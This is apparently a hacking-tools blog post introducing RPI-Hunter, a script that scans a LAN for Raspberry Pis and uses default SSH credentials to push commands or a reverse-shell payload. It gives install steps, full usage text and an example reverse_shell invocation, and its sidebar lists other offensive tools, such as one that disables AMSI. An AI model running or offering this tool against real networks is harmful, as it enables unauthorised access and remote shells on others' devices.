RPI-Hunter : Automate Discovering & Dropping Payloads on LAN Raspberry

rpi hunter is useful when there are multiple Raspberry Pi’s on your LAN with default or known credentials, in order to automate sending commands/payloads to them.

Also Read – VSHG : A Standalone Addon for GnuPG

Installation

  • Install dependencies: sudo pip install -U argparse termcolor and sudo apt -y install arp-scan tshark sshpass
  • Download rpi-hunter: git clone https://github.com/BusesCanFly/rpi-hunter
  • Navigate to rpi-hunter: cd ./rpi-hunter
  • Make rpi-hunter.py executable: chmod +x rpi-hunter.py
  • One line variant: sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

Usage

usage: rpi-hunter.py [-h] [–list] [–no-scan] [-r IP_RANGE] [-f IP_LIST]
[-c CREDS] [–payload PAYLOAD] [-H HOST] [-P PORT]
[–safe] [-q]
optional arguments:
-h, –help show this help message and exit
–list List available payloads
–no-scan Disable ARP scanning
-r IP_RANGE IP range to scan
-f IP_LIST IP list to use (Default ./scan/RPI_list)
-u UNAME Username to use when ssh’ing
-c CREDS Password to use when ssh’ing
–payload PAYLOAD (Name of, or raw) Payload [ex. reverse_shell or ‘whoami’]
-H HOST (If using reverse_shell payload) Host for reverse shell
-P PORT (If using reverse_shell payload) Port for reverse shell
–safe Print sshpass command, but don’t execute it
-q Don’t print banner
Example usage: ./rpi-hunter.py -r 192.168.0.0/16 –payload reverse_shell -H 127.0.0.1 -P 1337
Run ./rpi-hunter.py –list to see avalible payloads.
Payloads can be specified by the payload name from –list or as raw input
ex. –payload reverse_shell or –payload [your cli command here]

Disclaimer

The standard internet fun disclaimer applies. Don’t commit crimes, be responsible.I am in no way responsible for anything and everything you do with rpi-hunter.

R K

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

2 days ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

2 days ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

4 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

7 days ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago